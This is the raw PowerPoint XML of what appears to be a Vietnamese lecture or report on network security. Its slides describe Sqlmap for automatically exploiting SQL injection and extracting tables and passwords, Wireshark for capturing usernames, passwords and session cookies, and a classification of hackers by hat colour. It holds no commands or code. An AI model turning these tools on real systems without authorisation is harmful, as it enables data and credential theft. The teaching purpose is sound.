            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B1037CA-1F23-6D34-BD6A-9BCD73156709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="723768" y="2451070"/>
            <a:ext cx="7696463" cy="3098807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2282658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0D6FF-9147-2FFB-8F70-8C374CF8BC7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83ECF70-5DC1-EB85-BA68-906D46B1205D}"/>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2F0008AF-EACD-65E6-4D76-0C151331ADAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3.2.2. Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64091CBF-5E61-931A-59B7-6109651668C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88</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053E73CF-A2C9-D805-8B1B-AEB3086806A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20595" y="770104"/>
            <a:ext cx="8915400" cy="1951815"/>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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nguồn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hoàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> SQL Injection. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bảng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cột</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khẩu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trợ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nhiều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>kỹ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thuật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> SQLi..</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173AC0E3-BB0F-8CE7-AD94-1E6F9A39E2A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2225040"/>
            <a:ext cx="5220335" cy="3489960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="464161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34259-B902-EA6A-12C1-1328A47288F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A285274-991D-555E-7002-52FF800AE544}"/>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CF1BF9D-04D7-91F7-46FD-E6AD6FB133C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>3.2.2. Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF176D6-8C90-0886-58FD-6B0EB702FFA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89</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F6079A8-9283-F786-57AB-E08D563572EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="876300"/>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Wireshark: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Sniffing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bắt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> tin (username, password, session cookie/PHPSESSID).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B93A7E97-4E3D-1669-52AC-1B43F2349522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2048814"/>
            <a:ext cx="7467600" cy="3493855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71881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5B3CF-238E-DC73-FCFA-C0B78D2FF62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D4A57A-8BA0-D8A3-56E7-A8529720B67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="51435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B87E4827-0292-22E7-D9B6-927B94FFF893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>1.1.2. Phân loại đối tượng tấn công</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FBD32B6-CC23-5DCF-DECD-5A0939C0F00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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF803E30-31C9-70EE-D4CD-B231E8DCB1E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344170" y="758149"/>
            <a:ext cx="8455660" cy="4465324"/>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Hacker Mũ Xanh (Blue Hat): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Chuyên gia bảo mật thực hiện kiểm thử xâm nhập (pentest) để đánh giá độ an toàn của hệ thống mạng.</a:t>
            </a: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Hacker Mũ Đỏ (Red Hat): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Ngăn chặn mũ đen bằng cách đánh sập hệ thống của chúng bằng virus/trojan, là phương pháp cực đoan và đôi khi trái pháp luật.</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Hacker Mũ Xanh Lá (Green Hat): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tân binh, thiếu kiến thức và kinh nghiệm, có thể gây hại khi cố gắng phá vỡ bảo mật.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10499292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260C1-13A6-8A46-C107-9CBD8D45216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2C69F60-AD38-6950-6954-23FA2B01888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6E6AC530-FFD4-CD1F-BAC7-4BEA09765AD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
